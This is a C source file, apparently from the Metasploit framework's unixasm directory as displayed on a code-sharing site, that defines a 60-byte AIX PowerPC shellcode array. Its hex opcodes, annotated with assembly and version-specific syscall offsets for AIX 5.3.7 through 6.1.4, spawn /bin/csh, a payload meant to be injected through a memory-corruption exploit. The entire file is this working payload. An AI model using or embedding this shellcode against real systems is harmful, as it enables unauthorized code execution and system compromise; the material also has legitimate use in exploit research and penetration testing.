Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/unixasm/aix-power-shellcode.c
Views: 11766
/*1* aix-power-shellcode.c2* Copyright 2008 Ramon de Carvalho Valle <[email protected]>3*4* This library is free software; you can redistribute it and/or5* modify it under the terms of the GNU Lesser General Public6* License as published by the Free Software Foundation; either7* version 2.1 of the License, or (at your option) any later version.8*9* This library is distributed in the hope that it will be useful,10* but WITHOUT ANY WARRANTY; without even the implied warranty of11* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU12* Lesser General Public License for more details.13*14* You should have received a copy of the GNU Lesser General Public15* License along with this library; if not, write to the Free Software16* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA17*18*/1920/*21* Supported AIX versions:22*23* -DAIX614 AIX Version 6.1.424* -DAIX613 AIX Version 6.1.325* -DAIX612 AIX Version 6.1.226* -DAIX611 AIX Version 6.1.127* -DAIX5310 AIX Version 5.3.1028* -DAIX539 AIX Version 5.3.929* -DAIX538 AIX Version 5.3.830* -DAIX537 AIX Version 5.3.731*32*/3334char shellcode[]= /* 60 bytes */35"\x3b\xa0\x07\xff" /* lil r29,2047 */36"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */37"\x40\x82\xff\xf9" /* bnel <shellcode> */38"\x7f\xc8\x02\xa6" /* mflr r30 */39"\x3b\xde\x01\xff" /* cal r30,511(r30) */40"\x38\x7e\xfe\x29" /* cal r3,-471(r30) */41"\x98\xbe\xfe\x31" /* stb r5,-463(r30) */42"\x94\xa1\xff\xfc" /* stu r5,-4(r1) */43"\x94\x61\xff\xfc" /* stu r3,-4(r1) */44"\x7c\x24\x0b\x78" /* mr r4,r1 */45#ifdef AIX61446"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */47#endif48#ifdef AIX61349"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */50#endif51#ifdef AIX61252"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */53#endif54#ifdef AIX61155"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */56#endif57#ifdef AIX61058"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */59#endif60#ifdef AIX531061"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */62#endif63#ifdef AIX53964"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */65#endif66#ifdef AIX53867"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */68#endif69#ifdef AIX53770"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */71#endif7273"\x4c\xc6\x33\x42" /* crorc 6,6,6 */74"\x44\xff\xff\x02" /* svca 0 */75"/bin/csh"76;77787980